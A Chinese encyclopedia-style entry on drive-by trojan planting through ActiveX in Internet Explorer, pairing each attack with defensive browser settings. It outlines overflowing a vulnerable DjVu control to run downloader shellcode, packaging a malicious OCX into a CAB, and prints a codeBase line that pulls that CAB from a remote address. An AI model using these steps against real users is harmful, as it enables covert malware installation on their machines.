每日一句: Build your own dreams, or someone else will hire you to build theirs. 打造自己的梦想,否则你就会被雇用去打造别人的梦想。 跟读

汉语站

2017年9月26日 星期二

丁酉(鸡)年八月初七

(图)ActiveX挂马ActiveX挂马

利用ActiveX是流氓软件“行凶”的主要技术手段之一,流氓软件大多都已经作古了,可ActiveX并没有被推出人们的视野,网页挂马看上了它,于是ActiveX挂马流行起来,成为了重要的几种挂马方式之一。

ActiveX挂马 - 北岸团队 [回目录]

ActiveX是微软开发的。微软的程序员似乎总是喜欢把世界想象的太过于善良,没有人会用ActiveX作恶一样。当年恶意软件流行的时期,一家名为“XX宝贝视频聊天室”的网站就曾利用色诱的方式,诱惑用户主动安装网站的ActiveX视频聊天控件。

该ActiveX控件不仅会主动跟踪用户网络信息,还带有弹出广告、下载用户Word文档等流氓行为。当利用ActiveX作恶的流氓软件越来越多后,微软在IE7中就忍痛添加了关于ActiveX认证的措施。如今所有的ActiveX在IE7中都会被先屏蔽,而不在像当初一样主动弹出安装窗口。

小百科:ActiveX是Microsoft对于一系列策略性面向对象程序技术和工具的称呼,ActiveX控件在使用时需要安装。

ActiveX挂马 - 流行原因 [回目录]

在流氓软件野蛮生长的那几年,流氓软件也如同各路山贼土匪一样,往往会因为争夺用户电脑中的重要位置而产生火拼,于是许多如今被黑客或者病毒开发者用来制造病毒的技术被应用在了这些流氓软件身上。后来病毒也开始向流氓软件取经,许多流氓软件开创的一些技术也被病毒拿来开始使用,ActiveX挂马应该是病毒从流氓软件身上学习的最彻底的技术。

小百科:许多浏览器在支持ActiveX方面并不如IE来的积极,虽然Firefox网景等浏览器都在不同程度上支持ActiveX,但是ActiveX出现问题最多的仍然是IE浏览器。

ActiveX会被挂马者利用,其实主要问题在于它的认证机制。早期,如果一个网站上有需要安装ActiveX才能够看到的东西,那么在访问该网站的时候,相关的ActiveX会反复的弹跳出来提示你是否安装它,在许多用户没有明白情况和细节的时候,往往会因为各种原因点击确定,允许ActiveX空间安装。

这就如同走在马路上,有一群人说自己原意跟你交朋友,这些人在面前一一经过,可以选择点头同意或者摇头否定,凡是点头同意的人都可以成为朋友,可以自由进出。恐怖的是,有些人在成为朋友之后,才发现他是个小偷或者无赖流氓。

目前利用ActiveX挂马主要有两种形势,一种是利用正常程序的ActiveX漏洞进行溢出挂马,另外一种则是直接编写恶意的ActiveX木马程序,将恶意的木马程序伪装成看似有某项功能的ActiveX控件,欺骗用户安装。接下来的案例中将会为大家演示黑客如何利用ActiveX挂马。

ActiveX挂马 - 攻防实录 [回目录]

方法1:通过漏洞挂马

(图)ActiveX挂马ActiveX挂马

攻:黑客在利用ActiveX进行网页挂马的时候,最常见到的就是利用那些带有漏洞的ActiveX进行挂马,通过用户系统内已有的ActiveX控件的触发,让木马在不知不觉中植入用户的电脑。

其中利用软件ActiveX漏洞发动攻击的著名例子有Flash和RealPlayer的ActiveX漏洞挂马程序,这软件的ActiveX漏洞都曾经造成了极大的危害,特别是RealPlayer至今仍然有黑客再使用这款软件的ActiveX漏洞挂马。

以前一段时间流行的DjVu ActiveX控件漏洞为例,首先我们将恶意代码输入到写字板中,然后另存为任意的HTML文件,然后利用IFRAME的代码将声称的HTML文件嵌入到正常的网页中,此时输入网址打开含有DjVu ActiveX控件漏洞的网页,我们本机的计算器程序就会被触发开启。而黑客通常不会这么善良,他们会将Shellcode代码修改成下载指定恶意程序的代码,然后让用户在打开相关网站后中招(图1)。
小百科:DjVu ActiveX控件是用于压缩图形文件的工具,它在处理超长的ImageURL属性参数时会出现溢出。如果用户受骗访问了恶意网页并向该属性传送了超长参数的话,就可以触发溢出,导致执行任意指令。

(图)ActiveX挂马ActiveX挂马

防:对于利用ActiveX漏洞来进行挂马的行为,最好的方法是建议用户使用IE之外的浏览器,例如Firefox、Maxthon360安全浏览器。此外作为补充,最好能够安装防挂马软件,值得注意的是,如果你要使用第三方浏览器,则需要设置防护软件进行支持。
方法2:编写恶意ActiveX木马程序

攻:ActiveX木马程序是利用许多用户会盲从的点击在网页上弹出的ActiveX询问安装按钮的弱点而进行传播的。许多用户往往并不能够分辨出那些ActiveX是无害的,哪些是被伪装成木马病毒的。

(图)ActiveX挂马ActiveX挂马

特别是这些本身就是木马程序的ActiveX程序为自己装扮上视频聊天、美女图库等诱惑性的幌子之后,那些耐不住寂寞经不起诱惑的用户就会冲动性的点击安装黑客设置在虚假网页中的ActiveX木马程序。

编写自己的ActiveX木马程序,仍然需要一定的编程基础,另外整个过程相当复杂,由于版面的原因,我们这里只向各位预备级安全工程师们简单阐述一下黑客在编写恶意ActiveX时的大致过程,如果有人对编写细节感兴趣,可以去查微软MSDN中的详细资料。

先黑客会编写一个具有Download或者其它恶意功能的OCX控件,这是恶意ActiveX程序的核心和灵魂,然后黑客会在编写一个Setup安全设置的INF文件,并用CAB压缩工具例如WinCAB将所需的两个文件压缩打包成一个CAB文件。最后黑客就可以将该为你见上传到自己的网站中,并在网页中写入调用安装ActiveX控件的代码即可开张,等待浏览该网页并上钩点击确认安装的受害者。

调用代码如下:

codeBase=http://192.168.1.1/web/setup.cab#version=1,0,0,0>

当然,这样的ActiveX代码是没有签名验证的,通常在IE的默认设置中不会被允许安装,但是仍然方法可以突破这些安全限制。

防:一般ActiveX挂马网页都是因为加入了用编写的恶意代码才具有破坏力的,这些ActiveX恶意代码就相当于一些小程序,只要打开该网页就会被运行。所以要避免恶意ActiveX的攻击只要禁止这些恶意代码的运行就可以了。
防范此种方式挂马的最好方法还是在客户终端机上操作,在客户终端机运行IE浏览器,点击“工具→Internet选项→安全→自定义级别”,将安全级别定义为“高”,对“ActiveX控件和插件”中第2、3项设置为“禁用”,其它项设置为“提示”,之后点击“确定”。这样设置后,当你使用IE浏览网页时,就能有效避免恶意网页中恶意代码的攻击。

ActiveX挂马 - 参考资料 [回目录]
词条内容仅供参考,如果您需要解决具体问题
(尤其在法律、医学等领域),建议您咨询相关领域专业人士。

标签: ActiveX挂马

同义词: 暂无同义词

词条统计

浏览次数 : 1942 次

编辑次数 : 1 次 历史版本

更新时间 : 2009-02-16

双语连环画